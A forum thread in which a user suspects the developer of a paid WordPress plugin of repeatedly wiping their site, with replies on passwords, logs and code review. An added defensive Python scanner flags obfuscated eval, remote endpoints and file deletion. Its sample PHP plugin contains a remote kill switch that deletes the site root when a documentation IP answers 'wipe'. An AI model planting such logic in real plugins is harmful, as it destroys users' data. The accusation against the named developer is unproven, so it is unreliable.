  1. #1 SitePoint Member (joined Jul 2012)

    Plugin developer who vents his anger by hacking into WordPress sites

    I'm posting this here because I'd like some feedback, and this subject isn't allowed anywhere on the WP Forum.

    After a lot of searching, I finally paid for a plugin that I really needed. I tried all the free versions, without success. The professional version looked well put together. It was expensive --$36 -- but it would have solved a lot of issues, so I paid the money. It is a well written plugin, but I did have a suggestion for the developer, so I went to the plugin homepage, and found that there is no way to get in touch with him unless you pay an additional almost $40 for six months of support. Every possible email link just dumps you back to the page where you have to pay for support. So even if you have a very basic question about installation, you're stuck unless you shell out more money. There is online documentation, but it is less than complete and often unclear. The developer is in Germany, and the site is available both in German and English. I speak German fluently, and read both versions, but there was no additional or clearer help on the German side of things.

    This all strikes me as misleading advertising on the part of the developer. It would be better business practice to charge more for the plugin and include some kind of basic service. The way it works now, you pay your money and the door shuts in your face.

    So at this point I went onto the WP site to write a review for the plugin. I said there what I've said here -- well written, works the way it's supposed to, too little documentation, and a really questionable support policy that verges on the unethical. The developer flagged my review, but the mod left a comment saying that the review was plain spoken, but not abusive.

    This is where the fun begins

    Within the hour, my WP installation had been hacked. The plugin in question, and all files and the mysql dbs associated with the plugin, disappeared. About three days' worth of writing, images, etc., just gone. I did have a backup, and I restored. Within five hours the exact same thing happened. I called my hosting service -- bluehost.com -- and they helped me get things restored. They also strongly suggested SiteLock and other security measures. I reinstalled WP, and was in the process of setting up SiteLock when my whole directory was wiped clean. Everything, not just the WP installation, gone. Before you ask: I'm on a Mac, but I scanned for malware and viruses anyway, and came up clean.

    The support person at bluehost.com was pretty impressed by this hacker's determination to teach me a lesson.

    All the rest of the directory restored without a problem, but the WP installation is proving more difficult. Trying to start over from scratch and do a clean install, I ran into errors that the bluehost people are looking at now. It may be a long time before I get this all working again, and at this point I think I have lost those three days of work for good.

    I went back to my WP Forum review of the plugin and added some information about what had happened. The mod deleted everything. Because it's a plugin you pay for, you can't discuss it anywhere on that forum. You can't warn people about the business practices, you can't ask if anyone else has had similar experiences. I would have liked to send the mod a private message with information from bluehost which makes it clear that the plugin developer in question is the person who did all this with what the bluehost support person said was almost a hundred percent certainty. But you can't private message mods, or at least, I can't see a way to do it.

    The internet is still very much the wild west, and I know there's nothing I can do to the developer. He's in Germany. There's no agency that will go after him, so he's free to hack away at me because I dared to point out a problem with his business practices. This is actually something that impacts on my living, as social marketing is crucial to publishing fiction these days. But it seems there should be some kind of central database where people could leave reviews. Now I've written down the whole story. Maybe I'll be able to get back to work and start reconstructing the mess I paid $36 for. The plugin, because you will be wondering, is Encyclopedia Pro.

  2. #2 Mittineague, Programming Team (joined Jul 2005, West Springfield, Massachusetts)
    Wow! I'd rather spend an hour of my own time writing my own plugin than pay that much for something like that to happen.

    So you're saying that after you restored your site using backups, with that plugin removed, your site was again soon non-functional?

  3. #3 SitePoint Member (joined Jul 2012)
    Unfortunately I don't have the skills to write even a simple plugin on my own, and in fact I don't mind paying somebody who does good work. But this is clearly someone who is willing to go to great lengths for revenge. And yes, the site is still non functional. They haven't figured out why, yet. I find it disturbing that there's no way to warn people about this kind of behavior.

  4. #4 SpacePhoenix (joined May 2007, Poole, UK)
    Change your FTP passwords ASAP just in case the person has knowledge of them. If that plugin was using a separate MySQL user from the main WordPress install, disable or delete that MySQL user that the plugin was using. If you weren't getting any other traffic from the person's IP address, maybe ask your host if they could deny access to your site from that person's IP address.

  5. #5 SitePoint Member (joined Jul 2012)
    Thank you, SpacePhoenix, for the good suggestions. All passwords -- ftp, mysql, wordpress, cpanel -- were changed after the second hacking incident. The mysql databases were deleted entirely.

    Maybe I should change the passwords again, just to be sure.

    I just don't understand someone who would go to the time and trouble to do all this.

  6. #6 SitePoint Wizard (joined Oct 2005)
    Have you examined your logs to see how you are being attacked and where the IP address of the attacker is coming from? If you are being hacked by the plugin developer, some sort of back door should be evident in the code, or something clearly obfuscated to make it difficult to determine what is happening. Did you look at the PHP code of the plugin? Did you try reinstalling without the plugin and see if you still get hacked?

  7. #7 SitePoint Addict (joined Oct 2008)
    You should check if any of the code looks weird in the plugin, like some obscured code or some code which somehow has some link to some IP / developer's website. If the developer has really done that, all people having paid plugins should be really a worried lot, because paid plugins come directly from the developer rather than via the WordPress repository. What this means is there are no checks of any sort for these plugins. A developer could create a wonderful free plugin and put it on the WordPress repository. Then for some basic required features they could say you need to purchase a plugin. That could even contain malicious code which stays dormant, but in case you face any issue and raise a complaint the developer could remotely modify the site. This also means that it's a bug / security loophole being made available via WordPress. This means even WordPress developers should take note of this issue, because if a plugin developer is able to wipe out an entire website remotely (not just the plugin folder but other folders of the WordPress installation), this is a huge security loophole left out by WordPress developers. Thank you very much for bringing out this issue and hopefully someone will take note of it.
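Posts #6 and #7 both suggest reading the plugin's PHP for obfuscated code, hard-coded remote endpoints and anything that can delete files. The following triage script is an added example written for this thread, not code from any poster or from the plugin in question; the sample plugin source and the IP 203.0.113.10 (a documentation range) are constructed to show what a remote "kill switch" would look like to such a scan.

```python
"""Triage a plugin's PHP sources for the indicators the replies above describe:
obfuscated code, hard-coded remote endpoints, and file deletion."""
import re
from pathlib import Path

# Hits are leads for manual review, not proof of malice: unlink() and remote
# HTTP calls also occur in legitimate uninstall and licensing code.
INDICATORS = {
    "eval_of_decoded_string": re.compile(
        r"\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\("),
    "long_base64_literal": re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{40,}['\"]"),
    "function_named_by_request": re.compile(r"\$\w+\s*\(\s*\$(?:_GET|_POST|_REQUEST|_COOKIE)\b"),
    "remote_callback": re.compile(r"https?://[^\s'\"]+|\b\d{1,3}(?:\.\d{1,3}){3}\b"),
    "file_deletion": re.compile(r"\b(?:unlink|rmdir)\b"),
}

def scan_source(text, filename="<memory>"):
    """Return (filename, line_no, indicator, snippet) for every matching line."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits.append((filename, no, name, line.strip()[:80]))
    return hits

def scan_plugin_dir(root):
    """Scan every .php file under a plugin directory, e.g. wp-content/plugins/<name>."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        hits.extend(scan_source(path.read_text(errors="replace"), str(path)))
    return hits

# Constructed sample (hypothetical plugin; 203.0.113.10 is a documentation IP):
# a "license check" that lets a remote party trigger deletion of the site root,
# plus an eval() of a base64 blob, the classic way to hide such logic.
SAMPLE_PLUGIN = """<?php
/* Plugin Name: Example Pro (constructed sample, not a real plugin) */
function ep_check_license() {
    $r = file_get_contents("http://203.0.113.10/check.php?site=" . home_url());
    if ($r === "wipe") { array_map("unlink", glob(ABSPATH . "*")); }
}
eval(base64_decode("ZWNobyAnaGknOw=="));
"""

if __name__ == "__main__":
    for filename, no, name, snippet in scan_source(SAMPLE_PLUGIN, "example-pro.php"):
        print(f"{filename}:{no}: {name}: {snippet}")
```

Run `scan_plugin_dir("wp-content/plugins/<plugin>")` against a copy of the installed plugin taken from a backup, then read each flagged line in context; a `remote_callback` hit sitting next to a `file_deletion` hit is the pattern worth escalating to the host with the access logs.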

  8. #8 SitePoint Wizard (joined Oct 2004, UK)
    Personally, as soon as I noticed the guy provides no direct method of contact, I would not have purchased the plugin in the first place. Seriously, how do you ask him pre-sales questions? There's not even a contact form. As for the support issue, TBH that's very clear on his site - the standard license is just for a year of updates, no support. Yes, that's a rubbish policy, but it's not hidden, so I wouldn't agree with your claim that it's 'unethical'; if he chooses to provide no free support that's his decision (as long as he states this before purchase, which he does).

    FYI, if you do need to contact him, he does have a contact email in his whois records plus a mailing address on his site. Regarding the hacking, I would be very careful about accusing the developer of any involvement until you have solid proof.